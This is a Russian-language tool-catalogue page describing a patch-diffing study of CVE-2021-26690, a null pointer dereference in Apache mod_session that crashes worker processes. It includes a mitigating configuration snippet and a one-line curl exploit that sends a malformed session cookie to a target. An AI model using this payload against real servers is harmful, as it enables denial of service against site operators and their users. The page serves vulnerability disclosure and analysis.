Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-26690---Apache-mod_session — CVE-2021-26690 сравнение патчей - Apache HTTP mod_session разыменование нулевого указателя | Kitploit
Инструменты/GitHubGitHub/7own/cve-2021-26690---apache-mod_session
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на Проникновение
GitHub7own/cve-2021-26690---apache-mod_session

CVE-2021-26690---Apache-mod_session

CVE-2021-26690 сравнение патчей - Apache HTTP mod_session разыменование нулевого указателя

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
111 год назадЕщё не проверено

Patch-диффинг для CVE-2021-26690 - Apache mod_session

Эта уязвимость представляет собой разыменование нулевого указателя в модуле mod_session Apache. Это вызовет отказ в обслуживании дочерних процессов httpd Apache. С помощью повторяющегося цикла все рабочие процессы Apache будут аварийно завершаться, что приведет к отказу в обслуживании для всех клиентов, подключающихся или подключенных к веб-сайту.

Эта уязвимость была первоначально обнаружена @antonio-morales.

Полные этапы процесса описаны в PDF-файле в этом репозитории.

Ограничение

Если сервер использует опцию SessionCryptoPassphrase через mod_session_crypto, cookie будет зашифрован и закодирован в base64.

root@kitploit:~
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>

В этом случае пары cookie сессии не могут быть изменены, и отказ в обслуживании не может произойти как таковой.

Эксплойт

root@kitploit:~
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
Скачать инструмент